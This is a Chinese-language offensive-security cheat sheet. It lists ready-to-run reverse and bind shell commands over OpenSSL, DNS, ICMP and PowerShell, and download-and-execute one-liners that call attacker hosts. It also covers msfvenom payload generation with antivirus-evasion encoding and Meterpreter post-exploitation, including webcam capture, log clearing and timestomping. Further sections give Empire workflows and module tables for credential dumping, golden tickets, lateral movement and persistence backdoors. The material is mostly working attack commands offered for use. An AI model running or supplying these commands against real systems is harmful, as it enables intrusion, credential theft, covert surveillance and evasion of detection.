生成證書>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Linux
監聽>openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
靶機執行>mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.108:1337 > /tmp/s; rm /tmp/s
此方式使用TLS1.2 協議對通信進行加密
Windows
攻擊機需監聽2個端口,一個端口發送命令,一個端口接收回顯發送>openssl s_server -quiet -key key.pem -cert cert.pem -port 1337接收>openssl s_server -quiet -key key.pem -cert cert.pem -port 1338靶機執行>openssl s_client -quiet -connect 192.168.0.108:1337|cmd.exe|openssl s_client -quiet -connect 192.168.0.108:1338
Dnscat2
安裝dnscat2>apt-get -y install ruby-dev git make g++>gem install bundler>git clone https://github.com/iagox86/dnscat2.git>cd dnscat2/server>bundle install執行>ruby dnscat2.rb abc.com -e open --no-cache
Powercat
靶機執行>powercat -c 192.168.0.108 -v -dns abc.com -e cmd.exe
dnscat2執行>session -i 1進入會話
Dnscat2 exe
Linuxhttps://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x86.tar.bz2 https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x64.tar.bz2https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip攻擊機執行>ruby dnscat2.rb --dns "domain=zone.com,host=192.168.0.108" --no-cache靶機執行>dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108
攻擊機執行>session -i [ID]進入會話
DNS TXT Command
https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1新建一個psh文件,使用out-dnstxt轉換,這里的命令是net user
y0stUSgtTi3i5QIA添加一條域名txt記錄,這里在本地設置,正常是在域名商的網站里配置
還需創建兩個txt記錄,分別是指定開始和結束的字符串
靶機執行>Import-Module .\DNS_TXT_Pwnage.ps1>DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop
Powershell
MSF+Powershell
反彈MSF靶機PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1')PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force攻擊機:>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_ https>run或>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")>Invoke-Shellcode -Shellcode ($buf)或>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1>powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"
Powercat
>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')正向連接靶機:powercat -l -p 8080 -e cmd.exe –v攻擊機:nc 192.168.0.1 8080 –vv反向連接:攻擊機:nc –l –p 8080 –vv靶機:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe遠程執行>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"正向連接靶機:powercat -l -p 8080 -e cmd.exe -v攻擊機:nc 192.168.0.1 8080 -vv反向連接:攻擊機:nc -l -p 8080 -vv靶機:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
Nishang
Bind shell
靶機:>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"攻擊機:>nc 靶機IP 12138
反向shell
攻擊機:>nc -vnlp 9999靶機:>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻擊機IP -port 9999"
UDP反向shell
攻擊機:>nc -lvup 12138靶機:>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻擊機IP -port 12138"
HTTPS
攻擊機:>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443" IP地址是本機IP
靶機:>powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')
ICMP
攻擊機IP:108靶機IP:100https://github.com/inquisb/icmpsh靶機執行>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108
攻擊機執行,開啟相應ICMP ECHO請求>sysctl -w net.ipv4.icmp_echo_ignore_all=1>./icmpsh_m.py 192.168.0.108 192.168.0.100
Base64
>Powershell "$string="net user";[convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($string))"
Metasploit
常規使用
#systemctl start postgresql.service 啟動數據庫服務#msfdb init 初始化數據庫#msfconsole進入MSF框架#search ms17-010 查找攻擊模塊#use exploit/windows/smb/ms17_010_eternalblue 使用模塊#set payload windows/x64/meterpreter/reverse_tcp 設置載荷#info 查看信息#show options查看需要設置的參數#set RHOST 192.168.125.138設置參數#exploit 執行攻擊模塊#back 回退
技巧使用
#handler -H 192.168.0.10 -P 3333 -p windows/x64/meterpreter/reverse_tcp快速監聽#setg 設置全局參數#set autorunscript migrate –f 自動遷移進程#set autorunscript migrate -n explorer.exe#set AutoRunScript post/windows/manage/migrate#set prependmigrate true 自動注入進程#set prependmigrateProc svchost.exe#set exitonsession false獲取到session后繼續監聽,獲得多個session#set stagerverifysslcert false 防止出現ssl錯誤#set SessionCommunicationTimeout 0 防止session超時退出#set SessionExpirationTimeout 0 防止強制關閉session#exploit -j -z 后臺持續監聽>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -e x86/shikata_ga_nai -b "x00" -i 5 -a x86 --platform windows PrependMigrate=true PrependMigrateProc=explorer.exe -f exe -o 1.exe 執行后注入到已存在的一個進程>set EnableStageEncoding true>set stageencoder x86/fnstenv_mov 編碼進行免殺>set stageencodingfallback false
模塊
Auxiliary
#show auxiliary 查看所有模塊
Payload
#show payloads 查看所有攻擊載荷Payload是目標被攻擊時執行的實際功能代碼生成載荷#use exploit/multi/script/web_delivery>set target 2>msfvenom --list payloads 列出所有payload>msfvenom --list encoders 列出所有編碼器
Windows
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe -o /root/1.exe#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o 1.exe#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f psh-reflection >xxx.ps1#msfvenom -a x64 --platform windows -p windows/powershell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1>msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> /root/1.exe 生成NC正向連接>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> 1.exe 生成NC反向連接
Linux
#msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e -f elf -a x86 --platform linux -o shell#msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.1 LPORT=11111 -f raw > shell.sh
MacOS
#msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f macho > shell.macho
Web
#msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.php#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f war > shell.war#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f aspx -o payload.aspx#msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.jsp#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f asp > shell.asp
Android
#msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f apk -o payload.apk#msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 -f raw > shell.apk#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 R > test.apk
shellcode
#msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.0.1 LPORT=11111 -f c –o /root/1.c#msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.1 LPORT=11111 -o shell.py#msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.py#msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.pl#msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.rb#msfvenom -p cmd/unix/reverse_lua LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.lua
msf設置監聽
#use exploit/multi/handler#set payloadwindows/meterpreter/reverse_http 指定相應的payload#set LHOST 192.168.0.1#set LPORT 11111#exploit -j 后臺監聽或在exploit模塊中直接使用set payload 命令指定payload
Meterpreter
交互
當攻擊成功后會返回會話,使用session -l命令列出當前獲取到的會話#session -l使用#sessions -i id 來進入一個會話進行交互#background 將當前會話放置后臺#sessions -x檢查心跳#sessions -u [ID] cmdshell升級meterpreter shell
提權
提權詳見提權模塊
命令
#shell 進入目標cmdshell#uictl [enable/disable] [keyboard/mouse/all] 開啟或禁止鍵盤/鼠標#uictl disable mouse 禁用鼠標#uictl disable keyboard 禁用鍵盤#webcam_list 查看攝像頭#webcam_snap 通過攝像頭拍照#webcam_stream 通過攝像頭開啟視頻#execute -H -i -f cmd.exe 執行cmd.exe,-H不可見,-i交互#execute -H -m -d calc.exe -f wce.exe -a "-o 1.txt" 隱藏執行#ps查看當前活躍進程#migrate pid 遷移進程#kill pid #殺死進程
文件操作
#pwd 查看當前目錄#ls 列出當前目錄文件#search -f *pass* 搜索文件#cat c:\\passwd.txt 查看文件內容#upload /tmp/pwn.txt C:\\1.txt 上傳文件#download c:\\passwd.txt /tmp/ 下載文件#edit c:\\1.txt 編輯或創建文件#rm C:\\1.txt 刪除文件#mkdir folder 創建文件夾#rmdir folder 刪除文件夾#lcd /tmp #攻擊者主機 切換目錄#timestomp -v C://2.txt #查看時間戳#timestomp C://2.txt -f C://1.txt #將1.txt的時間戳復制給2.txt
后滲透&權限維持
路由添加,socks建立,后門建立等查看查看后門&持久化板塊
清理日志
#clearev
MSF派生Cobalt strike和Empire
派生Empire
Empire創建一個Listener創建一個stager選擇windows/dllMSF使用>use post/windows/manage/reflective_dll_inject指定session,dll的路徑,進程pid
派生Cobalt Strike
cobalt 開啟一個監聽器windows/beacon_http/reverse_httpmsf>use exploit/windows/manage/payload_inject指定IP�、端口����、payload即可
Empire
安裝
#git clone https://github.com/EmpireProject/Empire.git#cd Empire/setup#./install.sh
監聽
(Empire) > listeners(Empire: listeners) > uselistener http(Empire: listeners) > info 查看參數信息(Empire: listeners/http) > set Name y(Empire: listeners/http) > set Host http://192.168.0.1(Empire: listeners/http) > set Port 8080(Empire: listeners/http) > execute>back命令返回listeners模塊>list查看已激活的listener>kill http刪除監聽
生成
(Empire: listeners) > usestager windows/launcher_vbs (雙擊tab鍵查看所有模塊)(Empire: stager/windows/launcher_vbs) > info必須設置listener的名字,可設置生成位置(Empire: stager/windows/launcher_vbs) > set Listener y(Empire: stager/windows/launcher_vbs) > execute可生成vbs,靶機執行即可上線�。使用launcher命令直接生成powershell或python腳本>launcher powershell Listener-Name使用rename對agents更名>rename 6NMCW4ZB target1使用main命令放回主菜單>list stale 列出失去權限的機器>remove stale 去除失去權限的機器
連接靶機及其他操作
>interact target1 連接>agent 返回靶機列表>back 返回上一層>shell net user 1 1 /add 執行系統目錄格式>mimikazt 加載模塊獲取密碼>creds 整理獲取的密碼,creds export /root/1.txt 保存密碼,creds hash/plaintext,顯示格式>sc 獲取當前桌面截圖,文件存儲在./Empire/download/agent名字/screenshot>download c:\pass.txt 下載靶機文件到本機>upload hacked.txt c:\hacked.txt 上傳本機文件到靶機
提權
>agents 列表中Username沒有星號則需要提權>bypassuac listener需指定一個監聽器 提權>usemodule privesc/ms16-032需指定一個監聽器 提權>usemodule privesc/powerup/allchecks執行所有腳本檢查漏洞
橫向
查詢域管登錄機器>usemodule situational_awareness/network/powerview/user_hunter
令牌竊取
>mimikatz>creds 獲取并整理hash及密碼>pth {ID}竊取管理員令牌>steal_token {PID}
會話注入
>ps 查看進程>usemodule management/psinject 設置ProcIP和Listener
Hash傳遞
Invoke-PsExec可能會被查殺>usemodule situational_awareness/network/powerview/find_localadmin_access 列出可PSexec橫向移動的機器>usemodule lateral_movement/invoke_psexec需設置ComputerName和Listener或>usemodule lateral_movement/invoke_wmi需設置ComputerName和Listener,credID跨域父域域控:dc.zone.com子域域控:sub.zone.com子域計算機:pc.sub.zone.com子域普通用戶:sub\user1查看信任關系>usemodule situational_awareness/network/powerview/get_domain_trust獲取父域krbtgt SID,使用management/user_to_sid獲取sid需設置Domain和User=krbtgt>usemodule credentials/mimikatz/dcsync 設置UserName 子域\krbtgt 獲取子域hash>usemodule credentials/mimikatz/golden_ticket 偽造sid需設置User為偽造用戶 sids偽造的標識符{krbtgt sid}-519>usemodule credentials/mimikatz/dcsync 獲取父域krbtgt的hash>usemodule credentials/mimikatz/golden_ticket 使用父域krbtgt進行PTH攻擊,指定父域CredID,用戶名和域>shell dir \\dc.zone.com\c$
后門&持久化
映像劫持
>usemodule lateral_movement/invoke_wmi_debugger設置Listener,ComputerName(大寫),TargetBinary(sethc.exe, Utilman.exe, osk.exe, Narrator.exe, Magnify.exe),分別是粘滯鍵,輕松訪問,屏幕鍵盤,講述人,放大鏡��。
注入注冊表啟動項
>usemodule persistence/elevated/registry*設置Listener,注冊表路徑RegPath [HKLM\software\microsoft\windows\currentversion\run]
計劃任務
>usemodule persistence/elevated/schtasks*設置Listener和DailyTime
WMI
>usemodule persistence/elevated/wmi設置Listener
注入SSP
查看SSP章節
Collection(信息采集)
Collection(信息采集)
| 模塊名 | 功能 |
|---|
| collection/ChromeDump | 收集chrome瀏覽器保存的密碼和瀏覽歷史記錄 |
| collection/FoxDump | 收集Firefox瀏覽器保存的密碼和瀏覽歷史記錄 |
| collection/USBKeylogger* | 利用ETW作為鍵盤記錄 |
| collection/WebcamRecorder | 從攝像頭捕獲視頻 |
| collection/browser_data | 搜索瀏覽器歷史記錄或書簽 |
| collection/clipboard_monitor | 按指定的時間間隔監視剪貼板 |
| collection/file_finder | 查找域中的敏感文件 |
| collection/find_interesting_file | 查找域中的敏感文件 |
| collection/get_indexed_item | 獲取Windows desktop search索引文件 |
| collection/get_sql_column_sample_data | 從目標SQL Server返回列信息�。 |
| collection/get_sql_query | 在目標SQL服務器上執行查詢 |
| collection/inveigh | Windows PowerShell LLMNR/mDNS/NBNS中間人工具 |
| collection/keylogger | 鍵盤記錄到keystrokes.txt文件中,文件位置/downloads/agentname/keystrokes.txt/agentname |
| collection/minidump | 進程的全內存轉儲,PowerSploit的Out-Minidump.ps1 |
| collection/netripper | 將NetRipper注入目標進程,該進程使用API掛鉤以攔截來自低特權用戶的網絡流量和與加密相關的功能,從而能夠在加密之前/解密之后捕獲純文本流量和加密流量���。 |
| collection/ninjacopy* | 通過讀取原始卷并解析NTFS結構,從NTFS分區卷中復制文件��。 |
| collection/packet_capture* | 使用netsh在主機上啟動數據包捕獲���。 |
| collection/prompt | 提示當前用戶在表單框中輸入其憑據,然后返回結果���。 |
| collection/screenshot | 屏幕截圖 |
| collection/vaults/add_keepass_config_trigger | 尋找KeePass配置 |
| collection/vaults/find_keepass_config | 此模塊查找并解析KeePass.config.xml (2.X)和KeePass.config.xml (1.X)文件�。 |
| collection/vaults/get_keepass_config_trigger | 該模塊從KeePass 2.X配置XML文件中提取觸發器說明 |
| collection/vaults/keethief | 此模塊檢索未鎖定的KeePass數據庫的database mastey key信息 |
| collection/vaults/remove_keepass_config_trigger | 該模塊從Find-KeePassConfig找到的所有KeePass配置中刪除所有觸發器 |
>usemodule collection/ tab補齊查看模塊>usemodule collection/screenshot 獲取當前桌面截圖,文件存儲在./Empire/download/agent名字/screenshot>usemodule collection/keylogger 鍵盤記錄,文件存儲在./Empire/download/agent名字/agent.log>usemodule situational_awareness/host/winenum 查看當前用戶�����、AD組��、剪切板內容�����、系統版本�、共享�����、網絡信息�、防火墻規則>usemodule situational_awareness/network/powerview/share_finder 列出域內所有共享>usemodule situational_awareness/network/arpscan>set Range 192.168.0.1-192.168.0.100 ARP掃描,需設置掃描網段區間>usemodule situational_awareness/network/portscan>set Hosts 192.168.0.1-192.168.0.100 端口掃描,需設置IP或IP段>usemodule situational_awareness/network/reverse_dns DNS信息,需設置IP>set Range 192.168.0.1-192.168.0.100>usemodule situational_awareness/network/powerview/get_domain_controller 查找域控
Code_execution(代碼執行)
| 模塊名 | 功能 |
|---|
| code_execution/invoke_dllinjection | 使用PowerSploit的Invoke-DLLInjection將Dll注入您選擇的進程ID�����。 |
| code_execution/invoke_metasploitpayload | 生成一個新的隱藏PowerShell窗口,該窗口下載并執行Metasploit Payload�����。這與Metasploit模塊theexploit/multi/scripts/web_delivery互動 |
| code_execution/invoke_ntsd | 使用NT Symbolic Debugger執行Empire launcher代碼 |
| code_execution/invoke_reflectivepeinjection | 使用PowerSploit的Invoke-ReflectivePEInjection進行反射PE注入,將DLL/EXE加載進PowerShell進程中,或者將DLL加載進遠程進程中 |
| code_execution/invoke_shellcode | 使用PowerSploit的Invoke--Shellcode注入Shellcode |
| code_execution/invoke_shellcodemsil | 執行shellcode |
Credentials(身份憑證)
| 模塊名 | 功能 |
|---|
| credentials/credential_injection* | 運行PowerSploit的Invoke-CredentialInjection創建具有明文憑證的登錄,而不會觸發事件ID 4648使用顯式憑據嘗試登錄 |
| credentials/enum_cred_store | 從Windows憑據管理器中轉儲當前交互用戶的純文本憑據 |
| credentials/invoke_kerberoast | 為具有非空服務主體名稱(SPN)的所有用戶請求kerberos票據,并將其提取為John或Hashcat可用格式 |
| credentials/powerdump* | 使用Posh-SecMod的Invoke-PowerDump從本地系統中轉儲哈希 |
| credentials/sessiongopher | 提取WinSCP已保存的會話和密碼 |
| credentials/tokens | 運行PowerSploit的Invoke-TokenManipulation枚舉可用的登錄令牌,并使用它們創建新的進程 |
| credentials/vault_credential* | 運行PowerSploit的Get-VaultCredential以顯示Windows Vault憑證對象,包括明文Web憑證 |
| credentials/mimikatz/cache* | 運行PowerSploit的Invoke-Mimikatz函數以提取MSCache(v2) hashes |
| credentials/mimikatz/certs* | 運行PowerSploit的Invoke-Mimikatz函數將所有證書提取到本地目錄 |
| credentials/mimikatz/command* | 使用自定義命令運行PowerSploit的Invoke-Mimikatz函數 |
| credentials/mimikatz/dcsync | 運行PowerSploit的Invoke-Mimikatz函數,以通過Mimikatz的lsadump::dcsync模塊提取給定的帳戶密碼 |
| credentials/mimikatz/dcsync_hashdump | 運行PowerSploit的Invoke-Mimikatz函數,以使用Mimikatz的lsadump::dcsync模塊收集所有域哈希 |
| credentials/mimikatz/extract_tickets | 運行PowerSploit的Invoke-Mimikatz函數,以base64編碼形式從內存中提取kerberos票據 |
| credentials/mimikatz/golden_ticket | 運行PowerSploit的Invoke-Mimikatz函數以生成黃金票據并將其注入內存 |
| credentials/mimikatz/keys* | 運行PowerSploit的Invoke-Mimikatz函數以將所有密鑰提取到本地目錄 |
| credentials/mimikatz/logonpasswords* | 運行PowerSploit的Invoke-Mimikatz函數以從內存中提取純文本憑據�。 |
| credentials/mimikatz/lsadump* | 運行PowerSploit的Invoke-Mimikatz函數以從內存中提取特定的用戶哈希����。 在域控制器上很有用���。 |
| credentials/mimikatz/mimitokens* | 運行PowerSploit的Invoke-Mimikatz函數以列出或枚舉令牌���。 |
| credentials/mimikatz/pth* | 運行PowerSploit的Invoke-Mimikatz函數以執行sekurlsa::pth來創建一個新進程�����。 |
| credentials/mimikatz/purge | 運行PowerSploit的Invoke-Mimikatz函數從內存中清除所有當前的kerberos票據 |
| credentials/mimikatz/sam* | 運行PowerSploit的Invoke-Mimikatz函數從安全帳戶管理器(SAM)數據庫中提取哈希 |
| credentials/mimikatz/silver_ticket | 運行PowerSploit的Invoke-Mimikatz函數,以生成服務器/服務的白銀票據并將其注入內存��。 |
| credentials/mimikatz/trust_keys* | 運行PowerSploit的Invoke-Mimikatz函數,從域控制器中提取域信任密鑰���。 |
Exfiltration(數據竊取)
| 模塊名 | 功能 |
|---|
| exfiltration/egresscheck | 可用于幫助檢查主機與客戶端系統之間的出口,詳細信息:https://github.com/stufus/egresscheck-framework |
| exfiltration/exfil_dropbox | 下載文件到dropbox |
Exploitation(漏洞利用EXP)
| 模塊名 | 功能 |
|---|
| exploitation/exploit_eternalblue | MS17_010永恒之藍漏洞利用 |
| exploitation/exploit_jboss | Jboss漏洞利用 |
| exploitation/exploit_jenkins | 在未授權訪問的Jenkins腳本控制臺上運行命令 |
Lateral_movement(橫向移動)
| 模塊名 | 功能 |
|---|
| lateral_movement/inveigh_relay | smb中繼攻擊 |
| lateral_movement/invoke_dcom | 使用DCOM在遠程主機上執行stager |
| lateral_movement/invoke_executemsbuild | 該模塊利用WMI和MSBuild編譯并執行一個包含Empire launcher的xml文件����。 |
| lateral_movement/invoke_psexec | PsExec橫向移動 |
| lateral_movement/invoke_psremoting | 遠程PowerShell橫向移動 |
| lateral_movement/invoke_smbexec | SMBExec橫向移動 |
| lateral_movement/invoke_sqloscmd | 利用xp_cmdshell橫向移動 |
| lateral_movement/invoke_sshcommand | 利用SSH橫向移動 |
| lateral_movement/invoke_wmi | 利用WMI橫向移動 |
| lateral_movement/invoke_wmi_debugger | 使用WMI將遠程機器上的二進制文件的調試器設置為cmd.exe或stager |
| lateral_movement/jenkins_script_console | 利用未授權訪問的Jenkins腳本控制臺橫向移動 |
| lateral_movement/new_gpo_immediate_task | 利用GPO中的計劃任務橫向移動 |
Management(管理)
| 模塊名 | 功能 |
|---|
| management/enable_rdp* | 在遠程計算機上啟用RDP并添加防火墻例外�����。 |
| management/disable_rdp* | 在遠程計算機上禁用RDP |
| management/downgrade_account | 在給定的域帳戶上設置可逆加密,然后強制下次用戶登錄時設置密碼����。 |
| management/enable_multi_rdp* | 允許多個用戶建立同時的RDP連接��。 |
| management/get_domain_sid | 返回當前指定域的SID |
| management/honeyhash* | 將人工憑證注入到LSASS |
| management/invoke_script | 運行自定義腳本 |
| management/lock | 鎖定工作站的顯示 |
| management/logoff | 從計算機上注銷當前用戶(或所有用戶) |
| management/psinject | 利用Powershell注入Stephen Fewer形成的ReflectivePick,該ReflectivePick在遠程過程中從內存執行PS代碼 |
| management/reflective_inject | 利用Powershell注入Stephen Fewer形成的ReflectivePick,該ReflectivePick在遠程過程中從內存執行PS代碼 |
| management/restart | 重新啟動指定的機器 |
| management/runas | 繞過GPO路徑限制 |
| management/shinject | 將PIC Shellcode Payload注入目標進程 |
| management/sid_to_user | 將指定的域sid轉換為用戶 |
| management/spawn | 在新的powershell.exe進程中生成新agent |
| management/spawnas | 使用指定的登錄憑據生成agent |
| management/switch_listener | 切換listener |
| management/timestomp | 通過'調用Set-MacAttribute執行類似耗時的功能 |
| management/user_to_sid | 將指定的domain\user轉換為domain sid |
| management/vnc | Invoke-Vnc在內存中執行VNC代理并啟動反向連接 |
| management/wdigest_downgrade* | 將計算機上的wdigest設置為使用顯式憑據 |
| management/zipfolder | 壓縮目標文件夾以供以后滲透 |
| management/mailraider/disable_security | 此函數檢查ObjectModelGuard |
| management/mailraider/get_emailitems | 返回指定文件夾的所有項目 |
| management/mailraider/get_subfolders | 返回指定頂級文件夾中所有文件夾的列表 |
| management/mailraider/mail_search | 在給定的Outlook文件夾中搜索項目 |
| management/mailraider/search_gal | 返回與指定搜索條件匹配的所有exchange users |
| management/mailraider/send_mail | 使用自定義或默認模板將電子郵件發送到指定地址���。 |
| management/mailraider/view_email | 選擇指定的文件夾,然后在指定的索引處輸出電子郵件項目 |
Persistence(持久化)
| 模塊名 | 功能 |
|---|
| persistence/elevated/registry* | 計算機啟動項持久化,通過HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run進行持久化,運行一個stager或者腳本 |
| persistence/elevated/schtasks* | 計劃任務持久化 |
| persistence/elevated/wmi* | WMI事件訂閱持久化 |
| persistence/elevated/wmi_updater* | WMI訂閱持久化 |
| persistence/misc/add_netuser | 將域用戶或本地用戶添加到當前(或遠程)計算機 |
| persistence/misc/add_sid_history* | 運行PowerSploit的Invoke-Mimikatz函數以執行misc::addsid以添加用戶的sid歷史記錄���。 僅適用于域控制器 |
| persistence/misc/debugger* | 將指定目標二進制文件的調試器設置為cmd.exe |
| persistence/misc/disable_machine_acct_change* | 禁止目標系統的機器帳戶自動更改其密碼 |
| persistence/misc/get_ssps | 枚舉所有已加載的安全軟件包 |
| persistence/misc/install_ssp* | 安裝安全支持提供程序dll |
| persistence/misc/memssp* | 運行PowerSploit的Invoke-Mimikatz函數以執行misc::memssp,將所有身份驗證事件記錄到C:\Windows\System32\mimisla.log |
| persistence/misc/skeleton_key* | 運行PowerSploit的Invoke-Mimikatz函數來執行misc::skeleton,植入密碼mimikatz的萬能鑰匙����。 僅適用于域控制器 |
| persistence/powerbreach/deaduser | DeadUserBackdoor后門,詳細信息:http://www.sixdub.net/?p=535 |
| persistence/powerbreach/eventlog* | 啟動事件循環后門 |
| persistence/powerbreach/resolver | 啟動解析器后門 |
| persistence/userland/backdoor_lnk | LNK文件后門 |
| persistence/userland/registry | 計算機啟動項持久化,通過HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run進行持久化,運行一個stager或者腳本 |
| persistence/userland/schtasks | 計劃任務持久化 |
Privesc(權限提升)
| 模塊名 | 功能 |
|---|
| privesc/ask | 彈出一個對話框,詢問用戶是否要以管理員身份運行powershell |
| privesc/bypassuac | UAC bypass |
| privesc/bypassuac_env | UAC bypass |
| privesc/bypassuac_eventvwr | UAC bypass |
| privesc/bypassuac_fodhelper | UAC bypass |
| privesc/bypassuac_sdctlbypass | UAC bypass |
| privesc/bypassuac_tokenmanipulation | UAC bypass |
| privesc/bypassuac_wscript | UAC bypass |
| privesc/getsystem* | 獲取system特權 |
| privesc/gpp | 利用windows組策略首選項缺陷獲取系統帳號 |
| privesc/mcafee_sitelist | 尋找McAfee SiteList.xml文件的純文本密碼 |
| privesc/ms16-032 | MS16-032本地提權 |
| privesc/ms16-135 | MS16-135本地提權 |
| privesc/tater | 利用PowerShell實現的Hot Potato提權 |
| privesc/powerup/allchecks | 檢查目標主機的攻擊向量以進行權限提升 |
| privesc/powerup/find_dllhijack | 查找通用的.DLL劫持 |
| privesc/powerup/service_exe_restore | 還原備份的服務二進制文件 |
| privesc/powerup/service_exe_stager | 備份服務的二進制文件,并用啟動stager.bat的二進制文件替換原始文件 |
| privesc/powerup/service_exe_useradd | 修改目標服務以創建本地用戶并將其添加到本地管理員 |
| privesc/powerup/service_stager | 修改目標服務以執行Empire stager |
| privesc/powerup/service_useradd | 修改目標服務以創建本地用戶并將其添加到本地管理員 |
| privesc/powerup/write_dllhijacker | 將可劫持的.dll以及.dll調用的stager.bat一起寫到指定路徑���。 wlbsctrl.dll在Windows 7上運行良好�����。需要重新啟動計算機 |
Recon(偵察)
| 模塊名 | 功能 |
|---|
| recon/find_fruit | 在網絡范圍內搜索潛在的易受攻擊的Web服務 |
| recon/get_sql_server_login_default_pw | 發現在當前廣播域之內的SQL Server實例 |
| recon/http_login | 針對基本身份驗證測試憑據 |
Situational_awareness(態勢感知)
| 模塊名 | |
|---|
| situational_awareness/host/antivirusproduct | 獲取防病毒產品信息 |
| situational_awareness/host/computerdetails* | 枚舉有關系統的有用信息 |
| situational_awareness/host/dnsserver | 枚舉系統使用的DNS服務器 |
| situational_awareness/host/findtrusteddocuments | 該模塊將枚舉適當的注冊表 |
| situational_awareness/host/get_pathacl | 枚舉給定文件路徑的ACL |
| situational_awareness/host/get_proxy | 枚舉當前用戶的代理服務器和WPAD內容 |
| situational_awareness/host/get_uaclevel | 枚舉UAC級別 |
| situational_awareness/host/monitortcpconnections | 監視主機與指定域名或IPv4地址的TCP連接,對于會話劫持和查找與敏感服務進行交互的用戶很有用 |
| situational_awareness/host/paranoia* | 持續檢查運行過程中是否存在可疑用戶 |
| situational_awareness/host/winenum | 收集有關主機和當前用戶上下文的相關信息 |
| situational_awareness/network/arpscan | 針對給定范圍的IPv4 IP地址執行ARP掃描 |
| situational_awareness/network/bloodhound | 執行BloodHound數據收集 |
